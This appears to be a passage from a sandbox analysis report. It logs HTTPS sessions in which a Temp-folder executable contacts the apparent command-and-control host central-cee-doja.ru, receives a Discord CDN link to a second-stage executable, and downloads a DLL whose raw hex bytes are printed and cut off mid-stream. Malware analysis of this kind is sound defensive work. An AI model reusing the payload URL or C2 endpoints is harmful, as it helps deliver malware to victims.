Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	104.21.89.193	443	192.168.2.4	49879	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:50 UTC	10714	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:51 UTC	10714	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eqr%2FAlB5UCEiqoVjy2zLgVpWl9vB0pBfCARKTYYXemrEi5jircc6tJtT1w2wNTIKYx6%2B0uo9vfOIgZ9RwikIrcKEpzJhTZQJQuWWTjH%2BficX2%2FXS5jgFTrdB%2F35%2BKOj6THXplvwJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0ae6eab730bf-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:51 UTC	10715	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:51 UTC	10715	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	104.21.89.193	443	192.168.2.4	49751	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:02:40 UTC	8695	OUT	GET /dlls/x64/SQLite.Interop.dll HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:02:41 UTC	8695	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:02:41 GMT Content-Type: application/x-msdos-program Content-Length: 1763632 Connection: close Last-Modified: Tue, 02 Nov 2021 17:47:38 GMT ETag: "1ae930-5cfd1e3a66280" Accept-Ranges: bytes CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T6JLnSU3G%2F%2Bs5Zx%2Bf%2BfZFKUAmblQ7ePKRRhTxN0CY1udZJ6Tpu1c1J4K9WjY9KAzb5ibS6WocZmX8YC8Lsty8spk2xDs74Hi54Z%2FL6qmSeW1x%2FzdmME8N485BPKLxud7Fb6L5nfQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0932bfad6c8d-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:02:41 UTC	8696	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7f 7b be a1 3b 1a d0 f2 3b 1a d0 f2 3b 1a d0 f2 8f 86 21 f2 2f 1a d0 f2 8f 86 23 f2 bb 1a d0 f2 8f 86 22 f2 1e 1a d0 f2 00 44 d3 f3 3c 1a d0 f2 00 44 d5 f3 2e 1a d0 f2 00 44 d4 f3 2b 1a d0 f2 e6 e5 1b f2 33 1a d0 f2 25 48 43 f2 38 1a d0 f2 3b 1a d1 f2 a2 1a d0 f2 ac 44 d8 f3 3a 1a d0 f2 ac 44 d0 f3 3a 1a d0 f2 a9 44 2f f2 3a 1a d0 f2 ac 44 d2 f3 3a 1a d0 f2 52 69 63 68 3b 1a d0 Data Ascii: MZ@!L!This program cannot be run in DOS mode.${;;;!/#"D<D.D+3%HC8;D:D:D/:D:Rich;
2023-11-18 09:02:41 UTC	8696	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 67 66 69 64 73 00 00 9c 00 00 00 00 c0 1a 00 00 02 00 00 00 86 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 94 08 00 00 00 d0 1a 00 00 0a 00 00 00 88 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 28 15 00 00 00 e0 1a 00 00 16 00 00 00 92 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @@.gfids@@.rsrc@@.reloc(@B
2023-11-18 09:02:41 UTC	8698	IN	Data Raw: 24 50 4c 8b c8 48 89 4c 24 30 4c 8b c7 48 8d 4c 24 60 48 89 4c 24 28 33 c9 48 89 5c 24 20 ff 15 d2 0e 15 00 48 8b 5c 24 68 48 83 c4 40 5f c3 cc cc cc 40 53 56 57 48 83 ec 40 48 8b d9 ff 15 a3 0e 15 00 48 8b b3 f8 00 00 00 33 ff 45 33 c0 48 8d 54 24 60 48 8b ce ff 15 91 0e 15 00 48 85 c0 74 39 48 83 64 24 38 00 48 8d 4c 24 68 48 8b 54 24 60 4c 8b c8 48 89 4c 24 30 4c 8b c6 48 8d 4c 24 70 48 89 4c 24 28 33 c9 48 89 5c 24 20 ff 15 62 0e 15 00 ff c7 83 ff 02 7c b1 48 83 c4 40 5f 5e 5b c3 cc cc cc 48 83 ec 28 85 d2 74 39 83 ea 01 74 28 83 ea 01 74 16 83 fa 01 74 0a b8 01 00 00 00 48 83 c4 28 c3 e8 16 04 00 00 eb 05 e8 e7 03 00 00 0f b6 c0 48 83 c4 28 c3 49 8b d0 48 83 c4 28 e9 0f 00 00 00 4d 85 c0 0f 95 c1 48 83 c4 28 e9 2c 01 00 00 48 89 5c 24 08 48 89 74 24 Data Ascii: $PLHL$0LHL$`HL$(3H\$ H\$hH@_@SVWH@HH3E3HT$`HHt9Hd$8HL$hHT$`LHL$0LHL$pHL$(3H\$ b\|H@_^[H(t9t(ttH(H(IH(MH(,H\$Ht$
2023-11-18 09:02:41 UTC	8699	IN	Data Raw: 00 00 cc cc cc 48 83 ec 28 e8 5b 07 00 00 85 c0 74 10 48 8d 0d 2c 6e 19 00 48 83 c4 28 e9 a7 ac 00 00 e8 f2 a1 00 00 85 c0 75 05 e8 cd a1 00 00 48 83 c4 28 c3 48 83 ec 28 33 c9 e8 d1 ae 00 00 48 83 c4 28 e9 34 0f 00 00 40 53 48 83 ec 20 0f b6 05 1f 6e 19 00 85 c9 bb 01 00 00 00 0f 44 c3 88 05 0f 6e 19 00 e8 36 05 00 00 e8 91 0e 00 00 84 c0 75 04 32 c0 eb 14 e8 48 ae 00 00 84 c0 75 09 33 c9 e8 d5 0e 00 00 eb ea 8a c3 48 83 c4 20 5b c3 cc cc cc 48 89 5c 24 08 55 48 8b ec 48 83 ec 40 8b d9 83 f9 01 0f 87 a6 00 00 00 e8 b7 06 00 00 85 c0 74 2b 85 db 75 27 48 8d 0d 84 6d 19 00 e8 3f ac 00 00 85 c0 74 04 32 c0 eb 7a 48 8d 0d 88 6d 19 00 e8 2b ac 00 00 85 c0 0f 94 c0 eb 67 48 8b 15 b5 25 19 00 49 83 c8 ff 8b c2 b9 40 00 00 00 83 e0 3f 2b c8 b0 01 49 d3 c8 4c 33 Data Ascii: H([tH,nH(uH(H(3H(4@SH nDn6u2Hu3H [H\$UHH@t+u'Hm?t2zHm+gH%I@?+IL3
2023-11-18 09:02:41 UTC	8700	IN	Data Raw: 83 ec 20 48 8d 1d 32 5e 17 00 48 8d 35 2b 5e 17 00 eb 16 48 8b 3b 48 85 ff 74 0a 48 8b cf e8 1d 00 00 00 ff d7 48 83 c3 08 48 3b de 72 e5 48 8b 5c 24 30 48 8b 74 24 38 48 83 c4 20 5f c3 cc cc 48 ff 25 8d 05 15 00 cc 48 89 5c 24 10 48 89 7c 24 18 55 48 8b ec 48 83 ec 20 83 65 e8 00 33 c9 33 c0 c7 05 f4 20 19 00 02 00 00 00 0f a2 44 8b c1 c7 05 e1 20 19 00 01 00 00 00 81 f1 63 41 4d 44 44 8b ca 44 8b d2 41 81 f1 65 6e 74 69 41 81 f2 69 6e 65 49 41 81 f0 6e 74 65 6c 45 0b d0 44 8b db 44 8b 05 97 68 19 00 41 81 f3 41 75 74 68 45 0b d9 8b d3 44 0b d9 81 f2 47 65 6e 75 33 c9 8b f8 44 0b d2 b8 01 00 00 00 0f a2 89 45 f0 44 8b c9 44 89 4d f8 8b c8 89 5d f4 89 55 fc 45 85 d2 75 52 48 83 0d 79 20 19 00 ff 41 83 c8 04 25 f0 3f ff 0f 44 89 05 45 68 19 00 3d c0 06 01 Data Ascii: H2^H5+^H;HtHHH;rH\$0Ht$8H _H%H\$H\|$UHH e33 D cAMDDDAentiAineIAntelEDDhAAuthEDGenu3DEDDM]UEuRHy A%?DEh=
2023-11-18 09:02:41 UTC	8702	IN	Data Raw: 0f 2b 41 a0 0f 2b 49 b0 0f 10 44 0a c0 0f 10 4c 0a d0 0f 18 84 0a 40 02 00 00 0f 2b 41 c0 0f 2b 49 d0 0f 10 44 0a e0 0f 10 4c 0a f0 75 9d 0f ae f8 e9 38 ff ff ff 0f 1f 44 00 00 49 03 c8 0f 10 44 0a f0 48 83 e9 10 49 83 e8 10 f6 c1 0f 74 17 48 8b c1 48 83 e1 f0 0f 10 c8 0f 10 04 0a 0f 11 08 4c 8b c1 4d 2b c3 4d 8b c8 49 c1 e9 07 74 68 0f 29 01 eb 0d 66 0f 1f 44 00 00 0f 29 41 10 0f 29 09 0f 10 44 0a f0 0f 10 4c 0a e0 48 81 e9 80 00 00 00 0f 29 41 70 0f 29 49 60 0f 10 44 0a 50 0f 10 4c 0a 40 49 ff c9 0f 29 41 50 0f 29 49 40 0f 10 44 0a 30 0f 10 4c 0a 20 0f 29 41 30 0f 29 49 20 0f 10 44 0a 10 0f 10 0c 0a 75 ae 0f 29 41 10 49 83 e0 7f 0f 28 c1 4d 8b c8 49 c1 e9 04 74 1a 66 66 0f 1f 84 00 00 00 00 00 0f 11 01 48 83 e9 10 0f 10 04 0a 49 ff c9 75 f0 49 83 e0 0f Data Ascii: +A+IDL@+A+IDLu8DIDHItHHLM+MIth)fD)A)DLH)Ap)I`DPL@I)AP)I@D0L )A0)I Du)AI(MItffHIuI
2023-11-18 09:02:41 UTC	8703	IN	Data Raw: 8b c2 48 8b d7 48 8b f9 49 8b c8 f3 aa 48 8b fa 49 8b c3 c3 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 0f 11 01 4c 03 c1 48 83 c1 10 48 83 e1 f0 4c 2b c1 4d 8b c8 49 c1 e9 07 74 36 66 0f 1f 44 00 00 0f 29 01 0f 29 41 10 48 81 c1 80 00 00 00 0f 29 41 a0 0f 29 41 b0 49 ff c9 0f 29 41 c0 0f 29 41 d0 0f 29 41 e0 66 0f 29 41 f0 75 d4 49 83 e0 7f 4d 8b c8 49 c1 e9 04 74 13 0f 1f 80 00 00 00 00 0f 11 01 48 83 c1 10 49 ff c9 75 f4 49 83 e0 0f 74 06 41 0f 11 44 08 f0 49 8b c3 c3 7e 2a 00 00 7b 2a 00 00 a7 2a 00 00 77 2a 00 00 84 2a 00 00 94 2a 00 00 a4 2a 00 00 74 2a 00 00 ac 2a 00 00 88 2a 00 00 c0 2a 00 00 b0 2a 00 00 80 2a 00 00 90 2a 00 00 a0 2a 00 00 70 2a 00 00 c8 2a 00 00 49 8b d1 4c 8d 0d a6 d5 ff ff 43 8b 84 81 0c 2a 00 00 4c 03 c8 49 03 c8 49 8b c3 41 ff Data Ascii: HHIHIffffffLHHL+MIt6fD))AH)A)AI)A)A)Af)AuIMItHIuItADI~{w*t****pILC*LIIA
2023-11-18 09:02:41 UTC	8704	IN	Data Raw: f1 d0 88 19 00 eb 2d 4c 8b 05 2b 11 19 00 eb b1 b9 40 00 00 00 41 8b c0 83 e0 3f 2b c8 48 d3 cf 48 8d 0d 12 d1 ff ff 49 33 f8 4a 87 bc f1 d0 88 19 00 33 c0 48 8b 5c 24 50 48 8b 6c 24 58 48 8b 74 24 60 48 83 c4 20 41 5f 41 5e 41 5d 41 5c 5f c3 48 89 5c 24 08 57 48 83 ec 20 48 8b f9 4c 8d 0d e4 f6 14 00 b9 04 00 00 00 4c 8d 05 d0 f6 14 00 48 8d 15 d1 f6 14 00 e8 0c fe ff ff 48 8b d8 48 85 c0 74 0f 48 8b c8 e8 a8 ef ff ff 48 8b cf ff d3 eb 06 ff 15 07 f4 14 00 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 5c 24 08 57 48 83 ec 20 8b d9 4c 8d 0d a9 f6 14 00 b9 05 00 00 00 4c 8d 05 95 f6 14 00 48 8d 15 96 f6 14 00 e8 b9 fd ff ff 48 8b f8 48 85 c0 74 0e 48 8b c8 e8 55 ef ff ff 8b cb ff d7 eb 08 8b cb ff 15 cb f3 14 00 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 5c 24 08 57 Data Ascii: -L+@A?+HHI3J3H\$PHl$XHt$`H A_A^A]A\_H\$WH HLLHHHtHHH\$0H _H\$WH LLHHHtHUH\$0H _H\$W
2023-11-18 09:02:41 UTC	8706	IN	Data Raw: ca 49 c1 e9 34 f2 0f 58 15 fb fc 14 00 f2 0f 10 1d 5b fc 14 00 66 0f e6 c2 f2 0f 10 0d 5f fc 14 00 f3 0f e6 d0 f2 0f 59 da f2 0f 5c e3 f2 0f 59 ca 66 0f 7e c0 66 0f 28 c4 f2 0f 5c c1 f2 0f 10 1d 4b fc 14 00 66 48 0f 7e c1 f2 0f 10 2d 4e fc 14 00 48 d1 e1 48 c1 e9 35 4c 2b c9 49 83 f9 0f 7e 28 66 0f 28 cc f2 0f 59 da f2 0f 59 ea f2 0f 5c e3 f2 0f 5c cc f2 0f 5c cb f2 0f 5c e9 66 0f 28 c4 66 0f 28 cd f2 0f 5c c5 f2 0f 5c e0 f2 0f 5c e1 66 0f 28 d8 66 0f 28 d0 f2 0f 59 d0 0f ba e0 00 0f 82 98 00 00 00 f2 0f 10 1d 70 39 15 00 f2 0f 59 da f2 0f 10 2d 34 39 15 00 f2 0f 11 64 24 30 66 0f 28 ca f2 0f 59 ca f2 0f 11 44 24 40 f2 0f 59 ea 66 0f 28 e0 f2 0f 58 1d 30 39 15 00 f2 0f 59 ca f2 0f 59 da f2 0f 59 e2 f2 0f 58 2d ec 38 15 00 f2 0f 59 ea f2 0f 58 1d 00 39 15 Data Ascii: I4X[f_Y\Yf~f(\KfH~-NHH5L+I~(f(YY\\\\f(f(\\\f(f(Yp9Y-49d$0f(YD$@Yf(X09YYYX-8YX9
2023-11-18 09:02:41 UTC	8707	IN	Data Raw: 14 00 0f 83 1f 03 00 00 66 0f 28 d0 f2 0f 59 15 63 f8 14 00 66 0f 28 e0 4d 8b ca 49 c1 e9 34 f2 0f 58 15 58 f8 14 00 f2 0f 10 1d c8 f7 14 00 66 0f e6 c2 f2 0f 10 0d cc f7 14 00 f3 0f e6 d0 f2 0f 59 da f2 0f 5c e3 f2 0f 59 ca 66 0f 7e c0 66 0f 28 c4 f2 0f 5c c1 f2 0f 10 1d b8 f7 14 00 66 48 0f 7e c1 f2 0f 10 2d bb f7 14 00 48 d1 e1 48 c1 e9 35 4c 2b c9 49 83 f9 0f 7e 28 66 0f 28 cc f2 0f 59 da f2 0f 59 ea f2 0f 5c e3 f2 0f 5c cc f2 0f 5c cb f2 0f 5c e9 66 0f 28 c4 66 0f 28 cd f2 0f 5c c5 f2 0f 5c e0 f2 0f 5c e1 66 0f 28 d8 66 0f 28 d0 f2 0f 59 d0 0f ba e0 00 0f 83 95 00 00 00 f2 0f 10 1d fd 33 15 00 f2 0f 59 da f2 0f 10 2d c1 33 15 00 f2 0f 11 64 24 20 66 0f 28 ca f2 0f 59 ca f2 0f 11 44 24 30 f2 0f 59 ea 66 0f 28 e0 f2 0f 58 1d bd 33 15 00 f2 0f 59 ca f2 Data Ascii: f(Ycf(MI4XXfY\Yf~f(\fH~-HH5L+I~(f(YY\\\\f(f(\\\f(f(Y3Y-3d$ f(YD$0Yf(X3Y
2023-11-18 09:02:41 UTC	8708	IN	Data Raw: 14 00 8b c8 ff 15 bc e4 14 00 cc e8 16 9c 00 00 48 89 98 c0 03 00 00 e8 32 a4 00 00 84 c0 74 12 b9 01 00 00 00 e8 60 a3 00 00 85 c0 0f 94 c0 88 43 20 48 8b 3b 48 8b 5b 08 48 8b cf ff 15 7c e5 14 00 48 8b cb ff d7 8b c8 e8 bc 01 00 00 90 8b c8 e8 48 7c 00 00 90 48 8b 5c 24 30 48 83 c4 20 5f c3 48 89 5c 24 08 57 48 83 ec 20 8b d9 e8 47 9c 00 00 48 85 c0 75 09 8b cb ff 15 46 e4 14 00 cc 48 8b b8 c0 03 00 00 48 85 ff 75 09 8b cb ff 15 31 e4 14 00 cc 80 7f 20 00 74 05 e8 35 a3 00 00 48 8b 4f 10 48 8d 41 ff 48 83 f8 fd 77 06 ff 15 31 e2 14 00 48 8b 4f 18 48 8d 41 ff 48 83 f8 fd 77 09 8b d3 ff 15 03 e4 14 00 cc 8b cb ff 15 f2 e3 14 00 cc cc 48 89 5c 24 08 48 89 74 24 10 57 48 83 ec 20 48 8b f2 48 8b f9 ba 28 00 00 00 8d 4a d9 e8 3a 8a 00 00 33 c9 48 8b d8 e8 d8 Data Ascii: H2t`C H;H[H\|HH\|H\$0H _H\$WH GHuFHHu1 t5HOHAHw1HOHAHwH\$Ht$WH HH(J:3H
2023-11-18 09:02:41 UTC	8709	IN	Data Raw: 5c 24 10 48 89 74 24 20 55 48 8b ec 48 83 ec 70 48 63 d9 48 8d 4d e0 e8 72 fd ff ff 81 fb 00 01 00 00 73 38 48 8d 55 e8 8b cb e8 ef fd ff ff 84 c0 74 0f 48 8b 45 e8 48 8b 88 18 01 00 00 0f b6 1c 19 80 7d f8 00 0f 84 dc 00 00 00 48 8b 45 e0 83 a0 a8 03 00 00 fd e9 cc 00 00 00 33 c0 66 89 45 10 88 45 12 48 8b 45 e8 83 78 08 01 7e 28 8b f3 48 8d 55 e8 c1 fe 08 40 0f b6 ce e8 41 a0 00 00 85 c0 74 12 40 88 75 10 b9 02 00 00 00 88 5d 11 c6 45 12 00 eb 17 e8 92 37 00 00 b9 01 00 00 00 c7 00 2a 00 00 00 88 5d 10 c6 45 11 00 48 8b 55 e8 4c 8d 4d 10 33 c0 c7 44 24 40 01 00 00 00 66 89 45 20 41 b8 00 02 00 00 88 45 22 8b 42 0c 48 8b 92 38 01 00 00 89 44 24 38 48 8d 45 20 c7 44 24 30 03 00 00 00 48 89 44 24 28 89 4c 24 20 48 8d 4d e8 e8 75 a4 00 00 85 c0 0f 84 41 ff Data Ascii: \$Ht$ UHHpHcHMrs8HUtHEH}HE3fEEHEx~(HU@At@u]E7*]EHULM3D$@fE AE"BH8D$8HE D$0HD$(L$ HMuA
2023-11-18 09:02:41 UTC	8711	IN	Data Raw: 66 0f 2f 25 fd f0 14 00 72 5c c7 44 24 40 01 00 00 00 0f 57 c0 f2 0f 11 44 24 38 ba 1f 00 00 00 f2 0f 11 74 24 30 48 8d 0d 38 01 16 00 c7 44 24 28 22 00 00 00 c7 44 24 20 01 00 00 00 44 8d 4a e4 4d 85 d2 74 14 49 b8 00 00 00 00 00 00 f0 ff e8 68 83 00 00 e9 a8 02 00 00 49 b8 00 00 00 00 00 00 f0 7f eb ea 66 0f 2f 25 87 f0 14 00 0f 82 15 01 00 00 f2 0f 10 0d f1 ef 14 00 48 8d 84 24 a0 00 00 00 f2 0f 10 1d 41 f0 14 00 0f 28 c4 f2 0f 10 15 66 f0 14 00 48 89 44 24 38 48 8d 84 24 98 00 00 00 48 89 44 24 30 48 8d 84 24 90 00 00 00 48 89 44 24 28 f2 0f 11 4c 24 20 f2 0f 10 0d 29 2d 17 00 e8 54 02 00 00 44 8b 8c 24 90 00 00 00 41 ff c9 44 89 8c 24 90 00 00 00 41 8d 81 fe 03 00 00 3d fd 07 00 00 77 36 49 63 c1 ba ff 03 00 00 48 03 c2 48 c1 e0 34 48 89 84 24 a8 00 Data Ascii: f/%r\D$@WD$8t$0H8D$("D$ DJMtIhIf/%H$A(fHD$8H$HD$0H$HD$(L$ )-TD$AD$A=w6IcHH4H$
2023-11-18 09:02:41 UTC	8712	IN	Data Raw: fa ff 0f 9d c0 85 c0 74 31 f2 0f 10 1d 83 28 17 00 f2 0f 5c de f2 0f 59 1d 5f 28 17 00 f2 0f 11 5c 24 78 f2 0f 51 54 24 78 f2 0f 11 54 24 70 f2 0f 10 64 24 70 0f 28 f4 eb 13 f2 0f 10 64 24 70 0f 28 de f2 0f 59 de f2 0f 11 5c 24 78 0f 28 cb 0f 28 c3 f2 0f 59 0d 61 eb 14 00 f2 0f 59 05 71 eb 14 00 f2 0f 58 0d 59 eb 14 00 f2 0f 5c 05 81 eb 14 00 f2 0f 59 cb f2 0f 59 c3 f2 0f 5c 0d 49 eb 14 00 f2 0f 58 05 79 eb 14 00 f2 0f 59 cb f2 0f 59 c3 f2 0f 58 0d 49 eb 14 00 f2 0f 5c 05 69 eb 14 00 f2 0f 59 cb f2 0f 59 c3 f2 0f 5c 0d 39 eb 14 00 f2 0f 58 05 41 eb 14 00 f2 0f 59 cb f2 0f 58 0d 15 eb 14 00 f2 0f 59 cb f2 0f 5e c8 85 c0 0f 84 94 00 00 00 f2 0f 10 1d 8d e1 14 00 48 b9 00 00 00 00 ff ff ff ff f2 0f 11 a4 24 80 00 00 00 48 8b 84 24 80 00 00 00 48 23 c1 48 89 Data Ascii: t1(\Y_(\$xQT$xT$pd$p(d$p(Y\$x((YaYqXY\YY\IXyYYXI\iYY\9XAYXY^H$H$H#H
2023-11-18 09:02:41 UTC	8713	IN	Data Raw: 24 28 21 00 00 00 41 8d 51 0c c7 44 24 20 08 00 00 00 e8 f4 78 00 00 e9 a9 01 00 00 0f 28 f0 4d 85 c0 74 07 0f 57 35 00 25 17 00 33 c0 83 fa ff 0f 9d c0 85 c0 74 31 f2 0f 10 25 fc 22 17 00 f2 0f 5c e6 f2 0f 59 25 d8 22 17 00 f2 0f 11 64 24 78 f2 0f 51 54 24 78 f2 0f 11 54 24 70 f2 0f 10 4c 24 70 0f 28 f1 eb 13 f2 0f 10 4c 24 70 0f 28 e6 f2 0f 59 e6 f2 0f 11 64 24 78 0f 28 ec 0f 28 c4 f2 0f 59 2d da e5 14 00 f2 0f 59 05 ea e5 14 00 f2 0f 58 2d d2 e5 14 00 f2 0f 5c 05 fa e5 14 00 f2 0f 59 ec f2 0f 59 c4 f2 0f 5c 2d c2 e5 14 00 f2 0f 58 05 f2 e5 14 00 f2 0f 59 ec f2 0f 59 c4 f2 0f 58 2d c2 e5 14 00 f2 0f 5c 05 e2 e5 14 00 f2 0f 59 ec f2 0f 59 c4 f2 0f 5c 2d b2 e5 14 00 f2 0f 58 05 ba e5 14 00 f2 0f 59 ec f2 0f 58 2d 8e e5 14 00 f2 0f 59 ec f2 0f 5e e8 85 c0 Data Ascii: $(!AQD$ x(MtW5%3t1%"\Y%"d$xQT$xT$pL$p(L$p(Yd$x((Y-YX-\YY\-XYYX-\YY\-XYX-Y^
2023-11-18 09:02:41 UTC	8715	IN	Data Raw: 89 bc ec 10 02 00 00 49 ff c5 49 3b df 0f 83 f6 fd ff ff 4c 8b e3 e9 c8 fd ff ff 49 3b df 73 10 4a 89 5c ec 20 4e 89 bc ec 10 02 00 00 49 ff c5 4c 3b e7 0f 83 d0 fd ff ff 4c 8b ff e9 a2 fd ff ff 4c 8b ac 24 20 04 00 00 48 8b bc 24 28 04 00 00 48 8b b4 24 30 04 00 00 48 8b 9c 24 38 04 00 00 4c 8b bc 24 18 04 00 00 48 8b 8c 24 00 04 00 00 48 33 cc e8 b9 b8 ff ff 48 81 c4 40 04 00 00 41 5e 41 5c 5d c3 48 8b c4 f2 0f 11 40 08 53 48 81 ec a0 00 00 00 0f 29 70 e8 0f 28 d1 0f 29 78 d8 45 33 c9 44 0f 29 40 c8 0f 28 c8 f2 0f 11 84 24 b8 00 00 00 4c 8b 9c 24 b8 00 00 00 44 0f 29 48 b8 4d 8b d3 44 0f 29 50 a8 49 8b cb 48 b8 ff ff ff ff ff ff ff 7f 48 c1 e9 34 4c 23 d0 f2 0f 11 94 24 b8 00 00 00 48 8b 9c 24 b8 00 00 00 4c 8b c3 48 8b d3 4c 23 c0 48 c1 ea 34 b8 ff 07 Data Ascii: II;LI;sJ\ NIL;LL$ H$(H$0H$8L$H$H3H@A^A\]H@SH)p()xE3D)@($L$D)HMD)PIHH4L#$H$LHL#H4
2023-11-18 09:02:41 UTC	8716	IN	Data Raw: 66 0f 7f 74 24 20 66 0f 7f 7c 24 30 83 3d e2 2c 19 00 00 0f 85 60 02 00 00 66 48 0f 7e c2 0f 28 f0 48 8b ca 48 0f ba f1 3f 48 3b 0d b9 dc 14 00 0f 87 82 00 00 00 48 3b 0d 04 dd 14 00 73 5a 48 3b 0d f3 dc 14 00 73 21 48 3b 0d 1a dd 14 00 74 53 f2 0f 10 c8 f2 0f 59 0d 2c dd 14 00 f2 0f 58 0d 0c dd 14 00 eb 3d 66 90 f2 0f 59 c0 f2 0f 59 c6 f2 0f 59 05 e0 db 14 00 f2 0f 58 c6 66 0f 6f 7c 24 30 66 0f 6f 74 24 20 48 81 c4 88 00 00 00 c3 0f 1f 84 00 00 00 00 00 0f 57 c9 45 33 c0 e8 15 05 00 00 66 0f 6f 7c 24 30 66 0f 6f 74 24 20 48 81 c4 88 00 00 00 c3 48 3b 0d 8a dc 14 00 72 28 e8 d7 75 00 00 66 0f 6f 7c 24 30 66 0f 6f 74 24 20 48 81 c4 88 00 00 00 c3 66 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 45 33 c0 4d 33 d2 48 3b ca 41 0f 95 c2 66 0f 54 35 2b db 14 00 f2 Data Ascii: ft$ f\|$0=,`fH~(HH?H;H;sZH;s!H;tSY,X=fYYYXfo\|$0fot$ HWE3fo\|$0fot$ HH;r(ufo\|$0fot$ HfffffffE3M3H;AfT5+
2023-11-18 09:02:41 UTC	8717	IN	Data Raw: 14 00 c5 d3 5c c0 c5 fb 58 c6 e9 5d fd ff ff c5 fb 10 3d 09 d8 14 00 c5 d3 58 c0 c5 fb 58 c6 e9 48 fd ff ff 66 66 66 66 0f 1f 84 00 00 00 00 00 e8 db 6d 00 00 e9 f0 fd ff ff e8 05 71 00 00 c5 f9 6f 7c 24 30 c5 f9 6f 74 24 20 48 81 c4 88 00 00 00 c3 66 66 66 66 66 0f 1f 84 00 00 00 00 00 48 83 ec 48 66 0f 7f 74 24 30 33 c0 66 0f 2f 05 8c d7 14 00 0f 28 d9 0f 28 f0 76 29 f2 0f 10 15 0c d7 14 00 b8 01 00 00 00 f2 0f 5c d0 f2 0f 10 05 0b d7 14 00 f2 0f 5c c1 0f 28 f2 f2 0f 58 f0 0f 57 db eb 28 f2 0f 10 05 5b d7 14 00 66 0f 2f c6 76 1a f2 0f 58 35 d5 d6 14 00 f2 0f 58 1d dd d6 14 00 83 c8 ff f2 0f 58 f3 0f 57 db 0f 28 c6 0f 28 d6 f2 0f 59 c6 f2 0f 58 d2 f2 0f 59 d3 f2 0f 58 d0 0f 28 c2 0f 28 ea 0f 28 ca f2 0f 59 2d 3c d6 14 00 f2 0f 59 0d 74 d6 14 00 f2 0f 59 Data Ascii: \X]=XXHffffmqo\|$0ot$ HfffffHHft$03f/((v)\\(XW([f/vX5XXW((YXYX(((Y-<YtY
2023-11-18 09:02:41 UTC	8719	IN	Data Raw: c0 c9 eb 03 41 8b c4 41 b9 08 00 00 00 85 c0 74 0b 45 85 ff 75 44 45 8d 79 02 eb 3e 48 8b 03 8a 10 48 8d 48 01 48 89 0b 8d 42 a8 a8 df 74 47 45 85 ff 45 0f 44 f9 48 ff c9 48 89 0b 84 d2 74 1a 38 11 74 16 e8 76 12 00 00 c7 00 16 00 00 00 e8 b7 6d 00 00 41 b9 08 00 00 00 33 d2 41 8b c4 41 f7 f7 44 8b c0 8d 4f d0 80 f9 09 77 21 40 0f be cf 83 c1 d0 eb 3b 40 8a 39 b8 10 00 00 00 45 85 ff 44 0f 44 f8 48 8d 41 01 48 89 03 eb cc 8d 47 9f 3c 19 77 09 40 0f be cf 83 c1 a9 eb 13 8d 47 bf 3c 19 77 09 40 0f be cf 83 c1 c9 eb 03 41 8b cc 41 3b cc 74 2d 41 3b cf 73 28 45 0b f1 41 3b f0 72 0c 75 04 3b ca 76 06 41 83 ce 04 eb 